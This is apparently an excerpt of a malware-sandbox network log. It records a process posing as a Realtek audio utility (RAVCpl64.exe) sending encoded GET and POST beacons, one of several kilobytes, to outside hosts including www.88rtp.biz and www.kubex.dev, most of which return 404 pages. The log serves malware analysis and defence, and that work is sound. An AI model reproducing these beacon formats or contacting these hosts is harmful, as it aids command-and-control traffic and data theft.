                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241553068 CET1289INData Raw: 72 65 61 64 20 6d 6f 72 65 20 2b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                Data Ascii: read more +</a> </div> <div class="ecaaesozmf menu_list clearfix"> <dl class="eize8dliaf"> <dd class="e
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241599083 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 73 6a 71 66 36 61 6e 6c 36 20 6d 65 6e 75 5f 6c 69 73 74 20 63 6c 65 61 72
                                                                                                                                                                                                                                Data Ascii: </div> <div class="esjqf6anl6 menu_list clearfix"> <dl class="evdc9fa4a6"> <dd class="epqdt1ciu6"><a href="/html/r
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241642952 CET1289INData Raw: 22 65 33 69 65 6a 73 65 31 76 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 68 74 6d 6c 2f 78 74 75 6e 76 61 61 72 70 6e 2f 22 20 74 69 74 6c 65 3d 22 e9 87 87 e8 b4 ad e4 b8 93 e5 8c ba 22 3e e9 87 87
                                                                                                                                                                                                                                Data Ascii: "e3iejse1vu"> <a href="/html/xtunvaarpn/" title=""></a> <div class="excwgmha5e submenu"> <div class="edf5vqmdqm submenu_wrap"> <div class="ec4w
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241686106 CET1289INData Raw: ba 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                                                                                                                                                                                                                Data Ascii: "> </div> </div> </div> </li> <li class="eda37hw2db"> <a href="/html/blqwdkefnx/" title=""></a>
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557071924 CET1289INData Raw: 22 3e 3c 61 20 68 72 65 66 3d 22 2f 68 74 6d 6c 2f 69 64 79 79 68 63 6c 65 79 69 2f 22 20 74 69 74 6c 65 3d 22 e5 91 98 e5 b7 a5 e5 85 b3 e7 88 b1 22 3e e5 91 98 e5 b7 a5 e5 85 b3 e7 88 b1 3c 2f 61 3e 3c 2f 64 64 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                Data Ascii: "><a href="/html/idyyhcleyi/" title=""></a></dd> </dl> </div> <div class="ef7sjgupgn submenu_right">


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                57192.168.11.2049816172.96.191.39807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.290703058 CET416OUTGET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.88rtp.biz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.634779930 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                content-length: 796
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:55:12 GMT
                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                58192.168.11.2049817217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:17.843333006 CET671OUTPOST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 52 39 45 73 36 49 49 47 6e 30 6e 72 57 5a 4a 74 70 33 42 62 37 58 6b 69 62 64 39 5a 68 79 64 47 6b 79 66 71 51 69 53 6b 73 67 4e 4f 69 41 6b 77 31 58 53 54 2f 42 41 49 34 49 42 67 4e 31 49 58 34 70 52 51 34 38 74 6a 46 62 6a 30 57 4d 6c 2f 59 64 2b 6e 30 48 72 32 77 6b 45 34 70 35 48 2f 47 45 50 67 4d 69 6b 74 62 4c 63 56 46 54 4b 6e 4b 6b 6b 74 61 76 72 65 64 71 4a 74 43 44 39 47 6d 59 4d 7a 57 73 74 65 5a 36 47 39 67 37 2b 47 2f 4e 6d 74 33 54 65 64 46 79 66 74 54 57 4e 30 42 56 2f 51 58 6e 57 6b 4b 71 6c 30 4f 59 54 50 6b 53 6d 4f 45 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3TedFyftTWN0BV/QXnWkKql0OYTPkSmOEg==
                                                                                                                                                                                                                                Dec 3, 2024 14:55:18.049494982 CET558INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:17 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                59192.168.11.2049818217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.559739113 CET691OUTPOST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 58 63 55 73 32 4c 51 47 33 6b 6e 71 4b 70 4a 74 2b 6e 42 66 37 58 59 69 62 63 35 7a 68 48 74 47 6b 54 76 71 57 54 53 6b 6c 77 4e 4f 73 67 6b 31 37 33 53 59 2f 42 38 2b 34 4a 39 67 4e 31 4d 58 34 6f 68 51 34 50 56 67 45 4c 6a 32 4f 38 6c 78 46 4e 2b 6e 30 48 72 32 77 6b 51 53 70 35 76 2f 47 56 66 67 50 44 6b 73 46 37 63 4b 55 54 4b 6e 62 55 6b 70 61 76 72 67 64 76 70 44 43 47 68 47 6d 5a 38 7a 57 34 5a 64 51 36 48 30 2f 72 2f 35 35 50 57 6c 78 79 4b 67 44 41 72 52 4b 48 42 75 4e 6a 79 4b 4b 56 69 41 4a 35 35 47 4b 6f 71 6e 6d 51 6e 56 5a 70 63 39 42 35 6c 2f 5a 6b 76 65 71 44 6d 30 57 69 76 50 2b 70 34 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHtGkTvqWTSklwNOsgk173SY/B8+4J9gN1MX4ohQ4PVgELj2O8lxFN+n0Hr2wkQSp5v/GVfgPDksF7cKUTKnbUkpavrgdvpDCGhGmZ8zW4ZdQ6H0/r/55PWlxyKgDArRKHBuNjyKKViAJ55GKoqnmQnVZpc9B5l/ZkveqDm0WivP+p4=
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.759258032 CET558INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:20 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                60192.168.11.2049819217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.278038025 CET2578OUTPOST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 58 63 55 73 32 4c 51 47 33 6b 6e 71 4b 70 4a 74 2b 6e 42 66 37 58 59 69 62 63 35 7a 68 48 6c 47 6b 67 33 71 56 77 36 6b 2f 77 4e 4f 6b 41 6b 30 37 33 53 2f 2f 46 51 69 34 4a 78 65 4e 33 45 58 35 4c 35 51 36 2b 56 67 4b 4c 6a 32 48 63 6c 38 59 64 2b 2b 30 48 37 36 77 6e 6f 53 70 35 76 2f 47 57 58 67 59 43 6b 73 48 37 63 56 46 54 4b 72 4b 6b 6b 46 61 76 54 57 64 76 74 39 42 31 35 47 6d 35 73 7a 52 4c 78 64 52 61 48 32 38 72 2f 68 35 50 62 37 78 7a 6d 57 44 44 32 32 4b 47 5a 75 63 53 50 6d 54 46 36 68 4c 6f 38 4b 49 72 57 4d 6f 69 6a 6c 45 72 55 63 4d 59 6c 52 5a 54 66 31 72 67 57 49 47 77 62 2b 6c 63 37 75 58 78 42 43 44 43 50 6d 57 75 35 53 78 57 79 6b 51 4a 64 79 4e 65 69 41 66 72 63 79 78 2f 49 62 78 62 4c 59 73 77 75 74 43 6a 4d 6d 79 76 65 59 49 4b 6e 65 54 6a 53 73 67 43 52 74 43 70 4f 4a 48 69 70 53 51 2b 33 76 49 54 71 45 41 35 79 49 6e 56 6b 50 4b 45 64 31 63 39 44 4c 68 51 6c 34 52 6c 41 64 70 2f 79 6d 6e 76 4e 6f 38 51 36 46 7a 4f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHlGkg3qVw6k/wNOkAk073S//FQi4JxeN3EX5L5Q6+VgKLj2Hcl8Yd++0H76wnoSp5v/GWXgYCksH7cVFTKrKkkFavTWdvt9B15Gm5szRLxdRaH28r/h5Pb7xzmWDD22KGZucSPmTF6hLo8KIrWMoijlErUcMYlRZTf1rgWIGwb+lc7uXxBCDCPmWu5SxWykQJdyNeiAfrcyx/IbxbLYswutCjMmyveYIKneTjSsgCRtCpOJHipSQ+3vITqEA5yInVkPKEd1c9DLhQl4RlAdp/ymnvNo8Q6FzOrbp9KILaDeZqP1DT3pSPbhjtJUan8M/ZxuN/IIeWtt+KNKtyZWHfusrVJr8nQzv+SEkg8taSFLcZXjf+4lsCdM+kuEafuYdgvYGxTWSPx+0nsq/Yibhp67ALUBM8MjkhZF/MQmk9ikh2BKvXrx1F+L0oZhhTW9ZhFGRH36nPATO1BnCqaCZn+MhnGtpKCzjIy9W7rSxOGumWc5ndV10tgCKKU4XleBE9+0Lum4dSFKng5Ixycpx2lPPnYxpspf9zDDpvrgwCf8ddeY9amyFpSkxvZ+xE83fCNPaWcOs2t0QRJ11GjfusCxVtaWxmnGchdoGrMrlHZzu6xMxjC/n80GgvOyh1Bf8IZc6Tjeul32qRnE5HAFJ2WFmo/8qxhFtuvQwtqg5sR9PkjgwjTpIWSXgQDNdoGZicH9ftkcXN9FpP7xzqnxCdLeuDB1crZSjatAeoLhH4be94wwaY21YjBAmb9b8qsU5vm95yhifwQzHMiclddev9Mn9elo6l7j1l3VVldyT4I0TWZ+FpWGy7k9vGie3f9biIvWFDDZb/0RfQfe6Olp0+9lfWCImYma38sTfhANUZ6XaXau5brk16ZpYd8vIx9ZjZuYJDSVvpS68C92aBXACeV5slJwIMro7oSj5du1jOYBS5w9YKLjRr4JY5nUo9WLk65iN [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.278063059 CET5156OUTData Raw: 69 41 30 78 61 72 62 51 42 48 71 68 42 37 31 35 39 52 36 6d 79 2f 61 35 54 67 45 73 74 76 65 65 66 4e 78 52 71 31 46 56 37 33 56 48 41 49 59 53 68 7a 55 6e 34 45 70 49 79 78 30 45 38 34 33 38 49 44 56 34 33 35 6a 5a 36 2f 33 46 6d 6e 73 42 5a 77
                                                                                                                                                                                                                                Data Ascii: iA0xarbQBHqhB7159R6my/a5TgEstveefNxRq1FV73VHAIYShzUn4EpIyx0E8438IDV435jZ6/3FmnsBZw+5p9U9FzTu5NphdrsMemEZRnUazUcCNzCxjwebvB58V/lmiUOyTy5Ed2qIEJdYEGij7TzRV/svsX1hphTzYUDz2WPriYzu0T74DPEv8DS7gHhL1lKbaz0CIC3zvAe9LvyBMtb9LC29NG4xsGquHIeJMNzkDBMgZT+
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.278135061 CET106OUTData Raw: 42 41 72 35 49 4f 77 54 59 73 59 36 48 38 30 68 78 2f 4e 77 30 69 4d 35 78 7a 30 42 44 63 73 58 5a 33 65 74 36 30 6a 6b 75 39 37 49 4a 46 6f 44 46 39 56 72 58 43 6d 5a 58 42 72 62 36 44 43 50 57 4b 4f 55 46 2b 66 56 4d 42 73 4d 49 47 6d 4d 6d 73
                                                                                                                                                                                                                                Data Ascii: BAr5IOwTYsY6H80hx/Nw0iM5xz0BDcsXZ3et60jku97IJFoDF9VrXCmZXBrb6DCPWKOUF+fVMBsMIGmMmsQNUhzXX01mYz4PVJT4Q1ZA==
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.500036001 CET558INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:23 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                61192.168.11.2049820217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:25.995148897 CET416OUTGET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.190704107 CET745INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 601
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:26 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
